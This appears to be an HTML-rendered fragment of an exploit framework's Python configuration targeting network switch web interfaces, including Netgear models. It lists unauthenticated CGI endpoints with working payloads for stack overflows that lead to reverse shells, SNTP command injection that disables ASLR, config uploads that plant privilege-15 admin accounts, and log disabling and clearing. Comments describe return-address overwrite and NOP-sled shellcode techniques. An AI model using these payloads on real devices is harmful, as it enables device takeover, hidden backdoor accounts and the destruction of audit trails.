							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'httpuploadfirmware.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'html'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpuploadfirmware.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'dummy'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">'Image Signature Error'</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'httpupload_runstart_cfg.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'file'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/update "running-config" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpupload_runstart_cfg.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/startup-config'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'/tmp/startup-config'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">'/tmp/startup-config'</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'version_upgrade.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'html'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/Upgrade "Firmware" (Frontend to "httpuploadfirmware.cgi")'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/version_upgrade.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'Firm Upgrade'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">'Firm Upgrade'</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'factory_reset.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'html'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Reset device to factory default (PoC: Too dangerous to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/factory_reset.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'Too dangerous to verify'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">'dummy'</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">False</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'sysinfo_config.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'html'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'System basic information configuration (Frontend to "change_mac_addr_set.cgi")'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/sysinfo_config.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'dummy'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">'"/cgi-bin/change_mac_addr_set'</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'change_mac_addr_set.cgi'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "switch_type/sys_hardver" (PoC: crash CGI)'</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'502'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/change_mac_addr_set.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'switch_type='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">116</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'&amp;sys_hardver=31337&amp;sys_macaddr=DE:AD:BE:EF:13:37&amp;sys_serialnumber=DE:AD:BE:EF:13:37&amp;password=tgnetadmin'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>

				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpupload.cgi?XXX'</span><span class="token punctuation">,</span> <span class="token comment"># Including alignment of opcodes in memory</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">False</span> <span class="token comment"># Boa/Hydra restart/watchdog, False = no restart, True = restart</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'priv15_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/Update running-config (PoC: add priv 15 credentials)'</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">'clear'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" password PASSWORD\n\n------'</span><span class="token punctuation">,</span>
						<span class="token string">'add_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpuploadruncfg.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'del_query'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span> 
						<span class="token string">'del_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=524&amp;usrName=USERNAME'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token string">'sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'SNTP command injection (PoC: disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'enable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'enable_query'</span><span class="token punctuation">:</span><span class="token string">'sntp_enable=1&amp;cmd=548'</span><span class="token punctuation">,</span>
						<span class="token string">'status_uri'</span><span class="token punctuation">:</span><span class="token string">'cmd=547'</span><span class="token punctuation">,</span>
						<span class="token string">'inject_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>

						<span class="token string">'inject_query'</span><span class="token punctuation">:</span><span class="token string">'sntp_Server=`echo 0 &gt; /proc/sys/kernel/randomize_va_space`&amp;sntp_Port=123&amp;cmd=550'</span><span class="token punctuation">,</span>
						<span class="token string">'check_query'</span><span class="token punctuation">:</span><span class="token string">'sntp_Server=`cat /proc/sys/kernel/randomize_va_space &gt; /tmp/check`&amp;sntp_Port=123&amp;cmd=550'</span><span class="token punctuation">,</span>

						<span class="token string">'delete_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'delete_query'</span><span class="token punctuation">:</span><span class="token string">'sntp_Server=+&amp;sntp_Port=123&amp;cmd=550'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_query'</span><span class="token punctuation">:</span><span class="token string">'sntp_enable=0&amp;cmd=548'</span><span class="token punctuation">,</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>

					<span class="token comment">#</span>
					<span class="token comment"># The stack overflow in 'username' and 'password' at same request are multipurpose.</span>
					<span class="token comment">#</span>

					<span class="token comment">#</span>
					<span class="token comment"># The trick to jump and execute:</span>
					<span class="token comment"># 1. Code: username=[garbage][RA + 0x58000000]&amp;password=[garbage][NULL termination]</span>
					<span class="token comment"># 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary</span>
					<span class="token comment"># 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)</span>
					<span class="token comment"># 4. We will also feed required function parameters, by adding them to '_CMD_'</span>
					<span class="token comment">#</span>
					<span class="token string">'stack_cgi_diag'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_log'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable/Clean logs)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=1'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">112</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_JUMP_&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">80</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_&amp;login=1'</span><span class="token punctuation">,</span>

						<span class="token string">'log_settings_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;LOGGING_SERVICE=0'</span><span class="token punctuation">,</span>			<span class="token comment"># Disable Logging CMD</span>
						<span class="token string">'log_settings_set_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>						<span class="token comment"># Disable Logging SIGSEGV ?</span>

						<span class="token string">'log_ramClear_cmd'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>									<span class="token comment"># Clean RAM log CMD</span>
						<span class="token string">'log_ramClear_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>							<span class="token comment"># Clean RAM log SIGSEGV ?</span>

						<span class="token string">'log_fileClear_cmd'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>									<span class="token comment"># Clean FILE log CMD</span>
						<span class="token string">'log_fileClear_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>							<span class="token comment"># Clean FILE log SIGSEGV ?</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=1'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">112</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_JUMP_&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">80</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_&amp;login=1'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_timeSntp_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp_Server=`echo 0 &gt; /proc/sys/kernel/randomize_va_space`&amp;sntp_Port=123'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_timeSntp_set_check'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp_Server=`cat /proc/sys/kernel/randomize_va_space &gt; /tmp/check`&amp;sntp_Port=123'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_timeSntpDel_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp_Server=+&amp;sntp_Port=123'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_timeSettings_set_cmd_enable'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp_enable=1'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_timeSettings_set_cmd_disable'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp_enable=0'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_timeSettings_set_SIGSEGV'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>		<span class="token comment"># SIGSEGV ?</span>
						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 

					<span class="token comment">#</span>
					<span class="token comment"># After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.</span>
					<span class="token comment"># Then we will start walk down from top of stack to hit the NOP sled to execute shellcode</span>
					<span class="token comment">#</span>
					<span class="token string">'heack_cgi_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: reverse shell)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=1'</span><span class="token punctuation">,</span>
						<span class="token string">'logout_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=3'</span><span class="token punctuation">,</span>
						<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'username=_ALIGN_USRNOP_SHELLCODE&amp;password=_PWDNOP_RA_START&amp;login=1'</span><span class="token punctuation">,</span>
						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token comment">#'stack':False, # False = use Heap, and there are no ASLR</span>
						<span class="token string">'stack'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span> <span class="token comment"># False = use Heap, and there are no ASLR</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>

				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>

			<span class="token string">'Netgear'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> 
				<span class="token string">'vendor'</span><span class="token punctuation">:</span> <span class="token string">'NETGEAR Inc.'</span><span class="token punctuation">,</span>
				<span class="token string">'modulus_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=home_login'</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak_JSON'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=home_login'</span><span class="token punctuation">,</span>
				<span class="token string">'xsid'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
				<span class="token string">'xsid_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=home_main'</span><span class="token punctuation">,</span>
				<span class="token string">'login'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Login/Logout on remote device'</span><span class="token punctuation">,</span>
					<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">'rsa'</span><span class="token punctuation">,</span>
					<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
					<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;username=USERNAME&amp;password=PASSWORD&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
					<span class="token string">'status_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=home_loginStatus'</span><span class="token punctuation">,</span>
					<span class="token string">'logout_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_logout'</span><span class="token punctuation">,</span>
					<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'log'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Disable and clean logs'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'disable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=log_settings'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;ram_sev_0=on&amp;ram_sev_1=on&amp;ram_sev_2=on&amp;ram_sev_3=on&amp;ram_sev_4=on&amp;ram_sev_5=on&amp;ram_sev_6=on&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'status'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=log_settings'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logfile_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=log_fileClear'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logfile_query'</span><span class="token punctuation">:</span><span class="token string">'{"":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logmem_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=log_ramClear'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logmem_query'</span><span class="token punctuation">:</span><span class="token string">'{"":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token comment"># Verify lacking authentication</span>
				<span class="token string">'verify'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> 
						<span class="token string">'set.cgi'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment"># 'username' also suffer from stack overflow</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: crash CGI)'</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'502'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;username=admin&amp;password='</span> <span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">312</span><span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token string">'&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpupload.cgi?XXX'</span><span class="token punctuation">,</span> <span class="token comment"># Including alignment of opcodes in memory</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span> <span class="token comment"># Boa/Hydra restart/watchdog, False = no restart, True = restart</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'priv15_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/Update running-config (PoC: add priv 15 credentials)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">'md5'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'Content-Type\n\nconfig-file-header\nusername "USERNAME" secret encrypted PASSWORD\n\n------'</span><span class="token punctuation">,</span>
						<span class="token string">'add_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/httpuploadruncfg.cgi'</span><span class="token punctuation">,</span>
